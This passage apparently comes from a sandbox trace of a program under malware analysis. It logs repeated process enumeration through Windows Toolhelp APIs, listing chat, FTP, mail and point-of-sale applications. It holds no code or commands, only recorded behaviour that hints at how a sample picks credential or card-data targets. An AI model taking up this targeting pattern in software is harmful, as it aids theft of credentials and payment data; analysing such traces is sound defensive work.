th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0232.007] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0232.013] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0232.014] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0232.016] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0232.017] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0232.019] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0232.021] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0232.023] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0232.025] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0232.078] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0232.080] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0232.081] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0232.083] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0232.084] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0232.086] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0232.088] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0232.092] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0232.094] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0232.096] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0232.097] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0232.099] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0232.100] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0232.102] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0232.103] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0232.105] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0232.110] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0232.112] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0232.114] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0232.116] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0232.118] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0232.330] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.332] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0232.334] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0232.336] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0232.337] CloseHandle (hObject=0x2278) returned 1 [0232.337] Sleep (dwMilliseconds=0x64) [0232.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0232.708] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.710] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0232.712] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0232.714] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.716] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0232.718] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.719] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0232.721] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0232.722] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0232.724] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.725] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.726] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0232.728] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.735] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.737] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.854] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.858] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.860] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.862] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.864] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0232.866] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0232.868] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0232.872] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.874] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0232.876] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0232.878] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0232.880] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0232.881] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0232.883] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.884] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0232.885] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0232.888] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0232.890] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0232.891] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0232.893] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0232.894] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0232.895] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0232.897] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0232.898] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0232.899] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0232.901] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0232.954] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0232.956] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0232.957] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0232.958] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0232.960] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0232.961] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0232.963] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0232.966] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0232.968] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, 